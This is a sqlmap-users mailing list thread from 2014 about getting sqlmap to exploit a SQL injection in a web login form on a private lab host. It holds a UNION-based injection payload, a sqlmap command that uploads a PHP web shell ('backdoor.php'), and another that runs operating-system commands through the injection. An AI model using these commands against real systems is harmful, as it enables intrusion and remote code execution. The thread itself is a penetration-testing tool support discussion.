Re: [sqlmap-users] File Write Error

SourceForge Headquarters 225 Broadway Suite 1600 San Diego, CA 92101 +1 (858) 422-6466

Brian,

I expect the program is taking the input for username and truncating it, so
ZAP sees the injection going in and a successful auth afterwards and
assumes the payload worked. I think this is a poor assumption to make.

On Fri, Mar 21, 2014 at 1:11 PM, Miroslav Stampar <
mir...@gm...> wrote:

> There is always a 302 redirect, so I am not sure how ZAP detected this as
> a SQLi.
>
> Kind regards,
> Miroslav Stampar
>
>
> On Fri, Mar 21, 2014 at 3:19 PM, Brian Olson <br...@hu...> wrote:
>
>> Thanks for the quick response, Miroslav and Bernardo.  It's very much
>> appreciated!  There is a UNION technique that is being reported by ZAP, but
>> sqlmap isn't finding it and I haven't quite figured out how to simply tell
>> it what to use explicitly.  ZAP detects a UNION vulnerability on
>> activate.php:
>>
>>
>>  "act=auth-login&pag=login&username=ZAP%27+UNION+ALL+select+NULL+--+&password=ZAP"
>>
>> My attempts to input this have not been successful, so I'm not sure if
>> it's a false positive or I'm not using sqlmap quite right (more likely) .
>>
>> CMDLINE
>> sqlmap -u "http://172.16.71.138:7879/activate.php"
>> --data='act=auth-login&page=login&username=admin&password=admin' -p
>> "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write
>> /usr/share/webshells/php/simple-backdoor.php --file-dest
>> progra~1/cyclope/ni4zlja=/backdoor.php  --prefix="'" --suffix="UNION ALL
>> select NULL --"
>>
>> As for the previous method, here's the attached file (on screen output
>> was massive - password is "password").  End result "[09:01:51] [CRITICAL]
>> all tested parameters appear to be not injectable. Also, you can try to
>> rerun by providing either a valid value for option '--string' (or
>> '--regexp')"
>>
>> Thanks for the help!
>>
>> Brian
>>
>>
>>
>> On Fri, Mar 21, 2014 at 8:02 AM, Bernardo Damele A. G. <
>> ber...@gm...> wrote:
>>
>>> On 21 March 2014 11:57, Bernardo Damele A. G. <ber...@gm...>
>>> wrote:
>>> > [...]
>>> > All in all, can you please relaunch sqlmap (make sure you run git pull
>>> > first to sync to the GitHub repository) with the following syntax:
>>>
>>> Command line:
>>>
>>> python sqlmap.py -u "http://172.16.71.138:7879/index.php"
>>> --data="act=auth-login&pag=login&username=admin&password=admin" -p
>>> username --threads=10 --dbms=mysql --level=5 --risk=3 --os-cmd id -v 3
>>> --parse-errors -t traffic.log --answers "language does the web server
>>> support=4,do you want to use for writable=2,comma separate list of
>>> absolute directory paths=C:/Progra~1/Cyclope/ni4zlja/,retrieve the=Y"
>>>
>>> Feel free to report back the result, the entire standard output of
>>> sqlmap and send me the traffic.log.
>>>
>>> Thank you.
>>> Bernardo
>>>
>>
>>
>>
>> ------------------------------------------------------------------------------
>> Learn Graph Databases - Download FREE O'Reilly Book
>> "Graph Databases" is the definitive new guide to graph databases and their
>> applications. Written by three acclaimed leaders in the field,
>> this first edition is now available. Download your free book today!
>> http://p.sf.net/sfu/13534_NeoTech
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
>
> ------------------------------------------------------------------------------
> Learn Graph Databases - Download FREE O'Reilly Book
> "Graph Databases" is the definitive new guide to graph databases and their
> applications. Written by three acclaimed leaders in the field,
> this first edition is now available. Download your free book today!
> http://p.sf.net/sfu/13534_NeoTech
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>

-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website